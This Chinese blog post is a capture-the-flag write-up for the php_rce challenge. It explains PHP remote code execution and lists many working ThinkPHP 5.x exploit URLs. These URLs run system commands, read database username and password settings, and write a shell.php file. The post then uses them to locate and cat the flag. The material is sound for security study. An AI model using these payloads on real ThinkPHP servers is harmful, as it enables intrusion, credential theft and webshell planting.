热门标签
热门文章
- 1stm32 mpu6050 cubemx 卡尔曼滤波法读取角度_dmp解算对比卡尔曼
- 2MybatisPlus联合查询_mybatisplus 联表查询
- 3图像分类国内外发展现状,1000字以上。
- 4二叉树的遍历-先序遍历、中序遍历、后序遍历_二叉树遍历前序中序后序
- 5【竞赛首推】2024年还有哪些高含金量的数学建模竞赛值得参加?_深圳杯数学建模2024
- 6Hadoop 安装及目录结构
- 7【源码拾遗】从vue-router看前端路由的两种实现_vue-router abstract
- 8kafka-集群搭建_kafka listeners=plaintext
- 9mac清理软件推荐免费 mac清理系统数据怎么清理 cleanmymac和腾讯柠檬哪个好
- 10java数据结构-队列详解_java arrayqueue
当前位置: article > 正文
【CTF | 网络安全】攻防世界 php_rce 解题详析_ctf thinkphp v5
作者:weixin_40725706 | 2024-05-28 16:27:21
赞
踩
ctf thinkphp v5
PHP REC
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。
举个例子:
// 服务端代码
$user_input = $_GET['user_input']; // 没有对输入进行过滤
eval('$result = ' . $user_input . ';'); // 远程代码执行
// 构造恶意代码
http://example.com/index.php?user_input=system('ls%20-la');
//远程执行 "ls -la" 命令。
- 1
- 2
- 3
- 4
- 5
- 6
- 7
在 Unix/Linux 系统中,ls -la 命令可以列出当前目录下的所有文件和子目录,并显示它们的详细信息,包括权限、创建时间、大小等等。
ThinkPHP V5漏洞Payload
thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
- 1
- 2
- 3
- 4
thinkphp 5
1、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
- 1
thinkphp 5.0.21
1、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
2、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
- 1
- 2
thinkphp 5.1.
1、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
2、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
3、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
4、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
5、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
6、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
7、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
8、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
5.0.20
1、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
- 1
姿势
使用thinkphp 5.1.payload进行尝试,
URL + /?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
- 1
回显如下:
根据提示,使用5.0.20版本的Payload
URL + /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
- 1
回显如下:
说明命令执行成功,接着抓取flag即可
Payload
URL + /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"
- 1
由上图可知,flag字段储存在flag文件夹下的flag文件中
使用cat命令读取flag
Payload
URL + /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
- 1
命令解析及详析姿势参考:[CTF/网络安全] 攻防世界 command_execution 解题详析
回显如下,拿到flag:
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/638327
推荐阅读
相关标签
